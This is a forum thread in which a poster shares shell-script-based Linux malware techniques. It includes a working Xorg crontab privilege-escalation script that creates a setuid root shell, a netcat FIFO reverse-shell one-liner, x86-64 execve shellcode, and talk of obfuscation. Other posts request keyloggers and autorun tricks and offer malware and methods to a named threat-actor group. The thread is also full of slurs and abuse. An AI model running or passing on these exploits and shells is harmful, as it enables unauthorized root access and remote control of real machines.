User Controls

Sh/Bash based malware for *Nix.

  1. #1
    Sophie Pedophile Tech Support
    Welcome to another edition of Sophie's Cyber Shenanigans. This thread, i got some unconventional ways to work on *Nix based malware. And a couple questions for the level 97 shell script wizards.

    So i am experimenting with shell scripts, to find out what is and isn't viable should i want to create a shell script based malware for loonix. Why shell script? They're easily obfuscated, a bunch of utils have PE/Static binary formats you can bring along, or deploy remotely, and all distros have `Sh` and almost always `Bash` as far as i am aware.

    What's more, shell scripts, allow one to invoke commands and operations from any scripting lang that have their interpreter installed on the distro you are targeting 'out of the box' as it. Which tend to be quite a few.

    Chances are you'll have access to: Perl, Python, Lua, TclSh, M4(Plus other Macro 'langs') and if you're lucky PHP, Ruby, Node and so on and so forth.

    Another benefit of using `Sh` or `Bash` is that you don't have to worry about compatibility issues. Should you want to make use of payloads written in let's say C, you have the opportunity to perform Recon simply with the `uname -svm` command and then you'll have the proper architecture and kernel version. Which is great to know if you want to write an exploit for the system you're on.

    Here's an example.


    #!/bin/bash


    # There are a bunch of vulns in the Xorg server and related utils like
    #
    # X.Org xorg-x11-xfs - Local Race Condition
    # xorg-x11-server - 'inittab Local Privilege Escalation
    #
    # And much more, we're gonna do the second one as an example
    #
    # When ##!!## occurs in the script i got some annotations below
    #
    cat << EOF > /tmp/x_orgasm
    cp /bin/sh /usr/local/bin/pwned ##!!##_1
    echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
    gcc /tmp/pwned.c -o /usr/local/bin/pwned ##!!##_2
    chmod 4777 /usr/local/bin/pwned
    EOF

    chmod +x /tmp/x_orgasm


    # prepare your anus
    cd /etc
    Xorg -fp "* * * * * root /tmp/x_orgasm" -logfile crontab :1 & ##!!##_3
    sleep 5
    pkill Xorg ##!!##_4

    sleep 120

    ls -l /etc/crontab*
    ls -l /usr/local/bin/pwned

    # Start elevated Sh
    /usr/local/bin/pwned


    ##!!##_1
    Before you say: you can't just copy /bin/sh. Well we don't really need to the line after that builds a Sh shell too.
    If you're afraid we won't have permissions for `gcc` here's something that'll do exactly the same with UID 0.


    Alternatively we could ship a shell in Asm with the payload up top.

    ##!!##_2

    /tmp and some of the other directories featured here get mounted as NOSUID which is good. Because NOSUID beats root.

    /usr/local/bin is part of the $PATH and has MODE 2775/drwxrwsr-x


    ##!!##_3

    The operation here is what triggers the bug. Without getting too much into the weeds killing Xorg at ##!!##_4 with pkill will cause inittab to retart the cronjob related to Xorg that we changed with the operation we ran previously which then starts our 'pwned' Sh with root privileges.

    Obfuscation

    There's tools to obfuscate bash. Which is great. Here's an example of this same script obfuscated with the methods below.


    String/Hex Hash, 1 Iteration
    Token/ForCode, 1 Iteration


    Find the result here

    Or if you prefer a picture check the spoiler out below.




    Anyway, i hope you found that informative. However before you go i do actually have a question for the level 97 shell script wizards.

    I want to have a function in a shell script that i can call with different commands, so `cmd_func cat /etc/passwd`. My current implementation looks like this:


    #!/usr/bin/env -S sh\_"umask\_700"\_-f
    # BTW This is legal right ^
    #
    # I'm U_masking because i am writing stuff out
    # Under a specific user account

    buff_ops()
    { # I want to run it through a FIFO pipe/buffer in fact it is a requirement.
    cmd=$0
    arg=$1
    mknod u_dev p && cat < `read -t (${cmd $'\0' arg})` 0<u_dev | /bin/bash 1>u_dev
    };

    buff_ops CMD ARG # <- is what i want


    I figured it should be good since stuff like this works also:

    rm -f x; mknod x p && nc 192.168.1.10 1337 0<x | /bin/bash 1>x


    Thicc threads niggas. One on low level security and dev incoming soon as well.
    The following users say it would be alright if the author of this post didn't die in a fire!
  2. #2
    Cowboy2013 Houston
    I know a little about python. Do you have any keyloggers that would email to any email? Preferably something besides gmail.

    And is there anyway to get something to autorun on windows without an arduino? With a flash drive or dvd?
  3. #3
    Sophie Pedophile Tech Support
    Originally posted by Cowboy2013 I know a little about python. Do you have any keyloggers that would email to any email? Preferably something besides gmail.

    And is there anyway to get something to autorun on windows without an arduino? With a flash drive or dvd?

    Yes and yes.
  4. #4
    Sophie Pedophile Tech Support
    I also have a keylogger that'll send you the data over UDP, one byte at a time. Which is good because that makes it more stealth. Would you like some random malware sir? I got malware out the ass, custom made by yours truly, OSS, and BH.

    We'll do luck of the draw. I'll number 10 random malwares, you pick a number. Ready?


    rand=$[ $RANDOM % 10 ] && echo -e $rand



    Anyway, i wish more people would be interested or competent in terms of *Nix malware.
  5. #5
    Sophie Pedophile Tech Support
    I'm an inspiration to Threat Actors all around the world.

    https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera

    Sh/Bash based malware is the future of loonix malware. Using native utils for offensive operations is almost always superior to shipping in a whole ass malware, especially with regards to Linux, no compatibility issues. It's great.
  6. #6
    troon Houston
    In the xorg hack, why do you bother with the cp of /bin/sh when you already write that with gcc and chmod it?
  7. #7
    Sophie Pedophile Tech Support
    Originally posted by troon In the xorg hack, why do you bother with the cp of /bin/sh when you already write that with gcc and chmod it?

    Redundancy.
  8. #8
    Sophie Pedophile Tech Support
    Also TeamTNT, if you're reading this. Don't download your payloads from a C2 server that literally has the name of the Operation in the domain. And, you guys need to obfuscate that shell script. I got a couple really good ways among my TTPs but if i share them they won't be as effective any more.

    I can design a new Obfuscation method however. And you guys should be able to as well, if you can't i'll trade a custom designed method, for something of equal value. Preferably 0day. Ok admittedly that's a steep price.

    All of this is for legitimate research purposes of course.

    edit: Oops * shell script not shell code lol
  9. #9
    troon Houston
    Originally posted by Sophie Redundancy.

    It doesn't add anything to the hack. Either you've got an exe that setuid(0) or you don't. I don't get what you mean.
  10. #10
    Sophie Pedophile Tech Support
    Originally posted by troon In the xorg hack, why do you bother with the cp of /bin/sh when you already write that with gcc and chmod it?

    Sometimes this happens.


    cp /bin/sh /usr/local/bin/pwned
    cp: cannot create regular file '/usr/local/bin/pwned': Permission denied
  11. #11
    troon Houston
    Originally posted by Sophie

    cp /bin/sh /usr/local/bin/pwned
    cp: cannot create regular file '/usr/local/bin/pwned': Permission denied

    In which case, you'd also get this from the gcc line.


    /usr/bin/ld: cannot open output file /usr/local/bin/pwned: Permission denied


    I still don't get it.
  12. #12
    Sophie Pedophile Tech Support
    If you look closely at this part:


    cat << EOF > /tmp/x_orgasm
    cp /bin/sh /usr/local/bin/pwned ##!!##_1
    echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
    gcc /tmp/pwned.c -o /usr/local/bin/pwned ##!!##_2
    chmod 4777 /usr/local/bin/pwned
    EOF


    You can tell that the operation above writes out everything between EOFto the /tmp directory, after which it's made execuyable with chmod +x. That means it can be run as a shell script.

    Here we are making sure that cronjob related to Xorg which has the permissions required will start the script in /tmp with the permissions we need.


    cd /etc
    Xorg -fp "* * * * * root /tmp/x_orgasm" -logfile crontab :1 & ##!!##_3
    sleep 5
    pkill Xorg


    Once the script is executed with the new permissions we can do the operations defined there without issue.

    Even if something goes wrong i write this:



    global _start
    section .text

    _start:
    push 59
    pop rax
    cdq
    push rdx
    mov rbx, 0x6363672f6e69622f
    push rbx
    mov rbx, 0x7273752f2f2f2f2f
    push rbx
    push rsp
    pop rdi
    push rdx
    mov rbx, 0xffffffff9cd19b9a
    not rbx
    push rbx
    mov rbx, 0x91888fd08f928bd0
    not rbx
    push rbx
    push rsp
    pop r8
    push rdx
    mov rbx, 0xffffffffffff90d2
    not rbx
    push rbx
    push rsp
    pop r9
    push rdx
    mov rbx, 0xffffffff9b9a9188
    not rbx
    push rbx
    mov rbx, 0x8fd091969dd0939e
    not rbx
    push rbx
    mov rbx, 0x9c9093d08d8c8ad0
    not rbx
    push rbx
    push rsp
    pop r10
    push rdx
    push rsp
    pop rdx
    push r10
    push r9
    push r8
    push rdi
    push rsp
    pop rsi
    syscall


    What that does is invoke gcc with execve with UID 0, so the shell we wrote out with


    echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c


    gets compiled the way we want to regardless of system permissions.
  13. #13
    Sophie Pedophile Tech Support
    It's not called exploits for nothing (n_n")
  14. #14
    troon Houston
    Originally posted by Sophie It's not called exploits for nothing (n_n")

    You don't have a fucking clue what you're talking about, do you?
    The following users say it would be alright if the author of this post didn't die in a fire!
  15. #15
    Sophie Pedophile Tech Support
    Originally posted by troon You don't have a fucking clue what you're talking about, do you?

    Last i checked you were the one that was asking a million questions about the subject at hand. See those four 'thanks' my post got those are from people who definitely know what they are talking about. Just because you're too fucking ignorant to understand what's going on in this thread doesn't mean that everyone is as incompetent as you. I even fucking spelled it out for you. If everyone else here understands the subject matter then maybe you should consider tat you're actually the one that doesn;t have a fucking clue.

    Why don't you shut the fuck up read up on offensive security and shell scripting, and look into the vulnerability i mentioned in the OP. Then come back and to talk shit to me.
    The following users say it would be alright if the author of this post didn't die in a fire!
  16. #16
    hydromorphone victim of incest [insincerely conduce my paisley]
    I wish I had more time for shit like this
    The things you regret at the end and why lol irony is a bitch
  17. #17
    troon Houston
    Originally posted by Sophie Last i checked you were the one that was asking a million questions … <crap> … I even fucking spelled it out for you

    You spelled fuck all out. You were talking total shit. Because you know shit.

    "Also, TeamTNT..." - you are having a fucking laugh. Or retarded, not sure yet.
  18. #18
    MLT Yung Blood
    nice xorg vuln, is it a zero-day? I've never seen it before.. if it's 0day then damn nice :P

    also, nice thread in general. I've got a ring3/userland linux rootkit based on DR0 (debug register, as opposed to LD_PRELOAD / dynamic linker) which I'll post tomorrow... it's multi-arch too (inline asm for each architecture.. itt'l use uname -m or /proc entries to detect the architecture in use, then run the relevant arch-specific inline assembly from there).
    Also, I said it's userland... well, that's not fully true. It's also active in kernelspace. It's just residing in userland/ring3 rather than at ring0, so that if the fucker updates their kernel they're still hooked. So basically it's living in userland but is performing ring3->ring0 hooking
    I suck dick at C(++), ASM, and kernel stuff in general... so I'm actually really fucking happy with how this kit has been coming along. It's only the 2nd kit I ever wrote too. First used LD_PRELOAD.

    The bash obfuscation you posted has inspired me to post a thread detailing a bunch of my bash obfuscation tricks, too :)


    EDIT:
    lol... do we know eachother btw? If so, who are you? PM if you don't wanna reveal your nick here.
    Just noticed you posted this https://niggasin.space/thread/5020 (that fuzzer is incredibly gross btw lmao wrote it for the memez hence the goto(); sphagetti code, zero bound checks anywhere, and user inputs passed to syscalls errywhere. I wrote a proper flash fuzzer in ruby. I'll upload that one for you. It uses the same lists, but it opens proper sockets etc rather than doing fucking gnome-www-browser loool)
  19. #19
    troon Houston
    Are you maybe a schizo-posting pedo?

    A zero day multi-arch ring3 to ring0? I fucking wait with bated breath.

    I'm not sure whether to laugh or cringe.
  20. #20
    troon Houston
    I got a DoS zero-day in a single line of pure bash script:


    sudo shutdown -h now


    Let me walk you through it.

    The 'sudo' command does stuff.

    The 'shutdown' command is self-explanatory. It shuts things down.

    The '-h' is what we call a 'flag', but I've seen it referred to as a 'parameter'.

    And the 'now' command is in there, but I don't really know what it does. DO NOT OMIT IT OR THE HACK WILL NOT WORK.

    If it asks for a password, then you're on your own. I can't help you on that bit.

    Oh, if anyone from Fin7 is reading this, can you pick up a carton of semi-skimmed from the shops on your way home?

    You're all welcome.
Jump to Top